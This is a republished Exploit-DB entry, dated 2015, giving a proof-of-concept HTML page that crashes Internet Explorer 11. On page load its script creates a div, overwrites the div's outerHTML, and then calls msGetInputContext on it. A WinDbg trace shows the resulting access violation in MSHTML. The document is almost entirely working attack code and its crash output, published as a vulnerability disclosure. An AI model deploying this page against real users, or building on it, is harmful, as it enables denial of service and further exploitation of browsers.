Microsoft Internet Explorer 11 – Crash (PoC) (2) - 体验盒子

作者： Pawel Wylecial

日期： 2015-06-08

类别：

dos

平台：

windows

来源：https://www.exploit-db.com/exploits/37239/

<!--
# Exploit title: Microsoft Internet Explorer 11 Crash PoC
# Date: 07.06.2015
# Vulnerable version: 11 (newest at the time 11.0.9600.17801)
# Tested on: Windows 7/8.1
# Author: Pawel Wylecial
# http://howl.overflow.pl @h0wlu
-->
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<script>
function boom() {
var divA = document.createElement("div");
document.body.appendChild(divA);

try {
//divA.contentEditable = "true";
divA.outerHTML = "AAAA";
var context = divA['msGetInputContext']();
}
catch (exception) {
}
}
</script>
</head>
<body onload='boom();'>
</body>
</html>
<!--
(2534.480c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=0fa48f84 ecx=00000000 edx=0a433fb8 esi=00000000 edi=0fa48e98
eip=5f302e86 esp=0c9db5a4 ebp=0c9db5c8 iopl=0 nv up ei pl zr na pe nc
cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010246
MSHTML!Tree::ElementNode::GetCElement:
5f302e86 f7410800001000testdword ptr [ecx+8],100000h ds:002b:00000008=????????
-->